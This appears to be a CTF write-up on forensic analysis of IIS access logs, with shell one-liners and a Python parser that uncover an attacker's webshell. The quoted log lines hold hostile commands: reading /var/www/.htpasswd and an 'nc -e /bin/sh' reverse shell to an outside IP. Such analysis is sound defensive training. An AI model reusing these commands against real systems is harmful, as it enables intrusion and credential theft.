Tags: iis grep awk logs access 

Rating:

## 1 - Ingress

> Our website was hacked recently and the attackers completely ransomwared our server!
> We've recovered it now, but we don't want it to happen again.
> Here are the logs from before the attack, can you find out what happened?

We start inspecting some log fields, looking for something uncommon. For example, in the [`cs(Referer)` field](https://en.wikipedia.org/wiki/HTTP_referer):
```shell
$ awk '{print $(NF-4)}' attack.log | sort | uniq -c | sort -nr
6947 -
1343 https://digitaloverdose.tech/dovercon/sponsoring-edition-2021
1318 https://digitaloverdose.tech/dovercon/2021/speakers
1286 https://digitaloverdose.tech/dovercon/2021/code-of-conduct
1278 https://digitaloverdose.tech/dovercon/2021/about
1268 https://digitaloverdose.tech/dovercon/2021
1262 https://digitaloverdose.tech/privacy
1255 https://digitaloverdose.tech/ctf/2021-autumn
1230 https://digitaloverdose.tech/team
1225 https://digitaloverdose.tech/faq
1224 https://digitaloverdose.tech/dovercon/2021/cfp
1214 https://digitaloverdose.tech/copyright
1213 https://digitaloverdose.tech/ctf/2021-spring
1210 https://digitaloverdose.tech/dovercon
1210 https://digitaloverdose.tech/conference
1208 https://digitaloverdose.tech/dovercon/2021/sponsoring
1206 https://digitaloverdose.tech/dovercon/cfp-edition-2021
1205 https://digitaloverdose.tech/dovercon/team-edition-2021
1204 https://digitaloverdose.tech/home
1202 https://digitaloverdose.tech/ctf/about
1197 https://digitaloverdose.tech/
1194 https://digitaloverdose.tech/ctf
1149 https://digitaloverdose.tech/dovercon/schedule-edition-2021
1149 https://digitaloverdose.tech/dovercon/2021/mentors
1135 https://digitaloverdose.tech/dovercon/2021/schedule
1118 https://digitaloverdose.tech/dovercon/2021/team
1090 https://digitaloverdose.tech/dovercon/speakers-edition-2021
7 https://digitaloverdose.tech/ywesusnz
1 cs(Referer)
```

What is that `ywesusnz`? Let's look at which requests were made to that URI:
```shell
$ grep ywesusnz attack.log
2021-09-06 20:44:19 135.233.142.30 GET ywesusnz cmd%3Dcd+.. 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/faq 200 0 0 20
2021-09-06 20:44:45 135.233.142.30 GET ywesusnz cmd%3Dpwd 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 26
2021-09-06 20:45:04 135.233.142.30 GET ywesusnz cmd%3Dwhoami 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 25
2021-09-06 20:45:16 135.233.142.30 GET ywesusnz cmd%3Dhostname 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 25
2021-09-06 20:45:46 135.233.142.30 GET ywesusnz cmd%3Dnetstat+-peanut 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 21
2021-09-06 20:46:04 135.233.142.30 GET ywesusnz cmd%3Dcat+%2Fvar%2Fwww%2F.htpasswd 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 22
2021-09-06 20:46:12 135.233.142.30 GET ywesusnz cmd%3Dcat+RE97YmV0dGVyX3JlbW92ZV90aGF0X2JhY2tkb29yfQ== 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 26
2021-09-06 20:46:19 135.233.142.30 GET ywesusnz cmd%3Dnc+-e+%2Fbin%2Fsh+207.35.160.84+4213 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 20
$ echo RE97YmV0dGVyX3JlbW92ZV90aGF0X2JhY2tkb29yfQ== | base64 -d
DO{better_remove_that_backdoor}
```
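The same two steps as a small Python script, added here as an example and not part of the original writeup: a parser for the IIS W3C format that takes the column names from the `#Fields` directive (the stray `cs(Referer)` line in the `uniq -c` output above is that header being counted), the referer frequency count, and the URL-decoding of `cs-uri-query` for every request to the suspect stem. The log lines embedded below are constructed, modelled on the challenge log.

```python
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample in IIS W3C extended format, same field order as the
# challenge log; the #Fields directive names the columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-09-06 20:40:01 135.233.142.30 GET /faq - 443 - 203.0.113.5 Mozilla/5.0 https://digitaloverdose.tech/home 200 0 0 12
2021-09-06 20:40:02 135.233.142.30 GET /team - 443 - 203.0.113.5 Mozilla/5.0 https://digitaloverdose.tech/home 200 0 0 9
2021-09-06 20:40:03 135.233.142.30 GET /team - 443 - 203.0.113.9 Mozilla/5.0 https://digitaloverdose.tech/faq 200 0 0 11
2021-09-06 20:44:19 135.233.142.30 GET ywesusnz cmd%3Dcd+.. 443 - 20.132.161.193 Mozilla/5.0 https://digitaloverdose.tech/faq 200 0 0 20
2021-09-06 20:44:45 135.233.142.30 GET ywesusnz cmd%3Dcat+%2Fvar%2Fwww%2F.htpasswd 443 - 20.132.161.193 Mozilla/5.0 https://digitaloverdose.tech/ywesusnz 200 0 0 26
"""

def parse_w3c(text):
    """One dict per request, keyed by the names in the #Fields directive.
    W3C logs may change field order mid-file, so the header is re-read."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):      # skip truncated lines
                rows.append(dict(zip(fields, values)))
    return rows

def rare_referers(rows, max_hits):
    """Referers seen at most max_hits times (the awk | sort | uniq -c step).
    '-' (no referer) is excluded: it is common, not suspicious."""
    counts = Counter(r["cs(Referer)"] for r in rows)
    return sorted(v for v, n in counts.items() if n <= max_hits and v != "-")

def webshell_commands(rows, stem):
    """Decode cs-uri-query for every request to the suspect stem. The '='
    arrives percent-encoded (cmd%3D...), so decode first, then split once."""
    out = []
    for r in rows:
        if r["cs-uri-stem"] == stem and r["cs-uri-query"] != "-":
            key, _, value = unquote_plus(r["cs-uri-query"]).partition("=")
            out.append((r["date"] + " " + r["time"], r["c-ip"], key, value))
    return out

if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_LOG)
    for ref in rare_referers(rows, max_hits=1):
        for ts, ip, key, cmd in webshell_commands(rows, ref.rsplit("/", 1)[-1]):
            print(f"{ts} {ip} {key}={cmd!r}")
```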

Original writeup (https://scavengersecurity.com/posts/digitaloverdose-loganalysis/#1---ingress).